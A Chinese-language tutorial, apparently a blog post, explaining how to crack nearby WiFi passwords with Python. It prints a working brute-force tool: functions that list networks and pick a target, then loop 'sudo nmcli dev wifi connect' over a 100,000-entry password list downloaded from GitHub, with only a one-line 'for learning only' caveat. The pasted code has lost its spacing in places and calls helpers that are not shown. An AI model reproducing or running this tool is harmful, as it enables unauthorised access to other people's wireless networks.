WiFi现在已经遍布我们生活方方面面,如今,如论到工作单位,还是租住的房子,或者一家餐厅,随处都可以连上WiFi。
因此,我们对WiFi密码的需求也没有之前那么迫切了。
如何破解WiFi密码?
本文,将会通过Python教大家如何实现,这里纯粹是为了学习用途。
1. WiFi列表
首先,我们需要获取附近的WiFi列表。
下面,就来写一个函数来获取附近的WiFi列表,函数命名为display_targets
:
def display_targets(networks, security_type): print("Select a target: \n") rows, columns = os.popen('stty size', 'r').read().split() for i in range(len(networks)): width = len(str(str(i+1)+". "+networks[i]+security_type[i]))+2 spacer = " " if (int(columns) >= 100): calc = int((int(columns)-int(width))*0.75) else: calc = int(columns)-int(width) for index in range(calc): spacer += "." if index == (calc-1): spacer += " " print(str(i+1)+". "+networks[i]+spacer+security_type[i])
这里,我们会用到ssid
工具包,用来获取附近的WiFi列表,存入到参数networks
。
2. 选择WiFi
获取WiFi列表之后,下一步要做的就是选择我们想要连接的WiFi,
def prompt_for_target_choice(max): whileTrue: try: selected = int(input("\nEnter number of target: ")) if(selected >= 1and selected <= max): return selected - 1 except Exception as e: ignore = e print("Invalid choice: Please pick a number between 1 and " + str(max))
这里很简单,就是一些通用的Python功能。
3. 暴力破解
目前已经获取并且选择了想要连接的WiFi,那么如何获取到它的密码呢?
这里要用到一种比较常见的方式:暴力破解。
这里,要用到Github上一个项目,它收集了最常用的10万个WiFi密码。我们就用着10万个密码暴力解锁WiFi即可。
def brute_force(selected_network, passwords, args): for password in passwords: # necessary due to NetworkManager restart after unsuccessful attempt at login password = password.strip() # when when obtain password from url we need the decode utf-8 however we doesnt when reading from file if isinstance(password, str): decoded_line = password else: decoded_line = password.decode("utf-8") if args.verbose isTrue: print(bcolors.HEADER+"** TESTING **: with password '" + decoded_line+"'"+bcolors.ENDC) if (len(decoded_line) >= 8): time.sleep(3) creds = os.popen("sudo nmcli dev wifi connect " + selected_network+" password "+decoded_line).read() # print(creds) if ("Error:"in creds.strip()): if args.verbose isTrue: print(bcolors.FAIL+"** TESTING **: password '" + decoded_line+"' failed."+bcolors.ENDC) else: sys.exit(bcolors.OKGREEN+"** KEY FOUND! **: password '" + decoded_line+"' succeeded."+bcolors.ENDC) else: if args.verbose isTrue: print(bcolors.OKCYAN+"** TESTING **: password '" + decoded_line+"' too short, passing."+bcolors.ENDC) print(bcolors.FAIL+"** RESULTS **: All passwords failed :("+bcolors.ENDC)
核心功能3个函数就完成了,只用了60行Python代码!
下面就把它们串联在一起:
def main(): require_root() args = argument_parser() # The user chose to supplied their own url if args.url isnotNone: passwords = fetch_password_from_url(args.url) # user elect to read passwords form a file elif args.file isnotNone: file = open(args.file, "r") passwords = file.readlines() ifnot passwords: print("Password file cannot be empty!") exit(0) file.close() else: # fallback to the default list as the user didnt supplied a password list default_url = "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-100000.txt" passwords = fetch_password_from_url(default_url) # grabbing the list of the network ssids func_call = start(1) networks = func_call[0] security_type = func_call[1] ifnot networks: print("No networks found!") sys.exit(-1) display_targets(networks, security_type) max = len(networks) pick = prompt_for_target_choice(max) target = networks[pick] print("\nWifi-bf is running. If you would like to see passwords being tested in realtime, enable the [--verbose] flag at start.") brute_force(target, passwords, args)
执行函数,就会在命令行下显示附近的WiFi列表,选择之后就开始逐个尝试密码。
不同的颜色代表不同不同的结果:
- 红色:测试失败
- 绿色:破解成功
- 紫色:测试中
现在,是不是发现这个看上去很复杂的事情变得简单许多?